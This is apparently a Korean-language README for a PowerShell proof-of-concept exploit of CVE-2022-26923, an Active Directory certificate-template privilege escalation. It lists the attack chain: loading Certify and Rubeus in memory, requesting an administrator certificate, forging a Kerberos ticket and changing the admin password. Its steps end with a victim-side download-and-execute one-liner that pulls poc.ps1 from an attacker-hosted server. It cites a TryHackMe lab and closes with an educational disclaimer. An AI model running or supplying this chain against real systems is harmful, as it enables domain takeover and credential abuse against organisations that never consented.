CVE-2022-26923-Powershell-POC
메모리에서 Certify와 Rubeus를 로드하고 자동으로 실행하는 PowerShell POC입니다.
작동 방식
- Certify.exe와 Rubeus.exe를 메모리에 로드합니다.
- 대상 머신에서 잘못 구성된 인증서 템플릿을 검색합니다. (자세한 내용: https://www.youtube.com/watch?v=HBRCI5O35R8)
- 취약한 템플릿을 기반으로 관리자(Administrative) 사용자에 대한 인증서를 요청합니다.
- 인증서를 인증서 핸들러로 보내면 .pfx 형식으로 변환하여 클라이언트로 다시 보냅니다.
- Rubeus를 사용하여 인증서를 로드하고 관리자 사용자에 대한 티켓을 생성합니다.
- 관리자 사용자의 비밀번호를 변경합니다. (데모용일 뿐입니다)
이 POC는 다음 TryHackMe 랩에서 테스트되었습니다: https://tryhackme.com/room/adcertificatetemplates
이 CVE는 권한 상승에 사용되므로 이 데모와 THM 랩에서는 초기 익스플로잇을 다루지 않습니다.
단계:
- python3 -m http.server 80 [Attacker Box]
- python3 uploader.py 8000 [Attacker Box]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]
참고: 이 POC는 교육 목적으로 제공되며, 발생하는 모든 결과에 대한 책임은 사용자 본인에게 있습니다.